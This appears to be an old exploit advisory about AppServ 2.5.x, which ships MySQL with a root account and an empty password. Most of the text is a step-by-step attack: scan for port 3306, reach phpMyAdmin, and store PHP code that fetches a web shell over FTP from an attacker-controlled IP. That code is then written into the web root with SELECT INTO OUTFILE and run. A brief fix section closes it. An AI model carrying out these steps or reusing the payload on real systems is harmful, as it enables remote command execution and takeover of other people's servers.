AppServ 2.5.x and Prior Exploit

[saudi linux <ksa2ksa () yahoo com>]

what AppServ
==========
AppServ is the Apache/PHP/MySQL open source software installer packages. 

Objective : - Easy to buid Webserver and Database Server
- For those who just beginning client/server programming.
- For web programmers/developers using PHP & MySQL.
- For programming techniques that is easily to be ported to other platforms such as WindowZ
- Single step installation , no need to perform multiple step, time consuming installation and configuration.
- Ready-to-run just after you've finished installing.ready-to-run just after you've finished installing.
- If you hate and boring M$ IIS Webserver. 
=====================================================
AppServ URL:http://www.appservnetwork.com

Vulnerability Ver: 2.5.X and prior

problem :
=================================

the program comes in default user (Root) and empty password which let attacker to contrlor program and computer.

=================================


Expliot Method

1)scan tool (SuperScan or whatever) 
this step to scan MySQL service on port 3306

2)when we found a serveic (MySQL on 3306) we can Reguest the IP from IE (Internet Explorer).
> From IE we can request the Machain IP like( http://xxx.xxx.xxx.xxx)

3)if we success the index page for AppServ open 

4)Now we can edit the databases and tables in Mysql by phpmyadmin
> From IE (http://xxx.xxx.xxx.xxx/PhpMyAdmin)

5)default MySQL Server come with two database (test,mysql),our target is (mysql ).
Now we can add new table contains our exploit 

- Create New table for example (exploit) with one fild and type TEXT
-insert in database the exploit ( PHP code) like :

==============start=================
<?
$conn_id = ftp_connect("Evil_IP_or_Attacker_ip");
$login_result = ftp_login($conn_id, "Attacker", "Passwd");
$download = ftp_get($conn_id, "C:\AppServ\www\phpShell.php", "phpshell.php", FTP_BINARY);
ftp_quit($conn_id);
?>

==============end=====================

the attacker could use " Windows FTP Server" or any FTP daemon, it's not a matter :-)
phpshell.php is a script function like (system,passthru,exec ...etc)
you can find nice phpshell here (http://phpfm.sf.net )
the attacker could download EXE file else.

 
 6)Now we are able to make a query to outfile by use INTO OUTFILE statement .
SELECT * From exploit INTO OUTFILE 'C:\\AppServ\\www\\Query.php'

7)Query.php contain Our PHP code 

8)if we success we can reguest 
(http://xxx.xxx.xxx.xxx/Query.php)

9)if FTP connection successful and downloaded phpshell.php in the victim PC you can send new request like:
(http://xxx.xxx.xxx.xxx/phpshell.php)

10) Game's Over

==================================================
Fix
=====
1)change Root passowrd
2)use firewall for aptche and MySQL Server
3)use Save Mode for your script

==============================================================

                       discovered by  Saudi Linux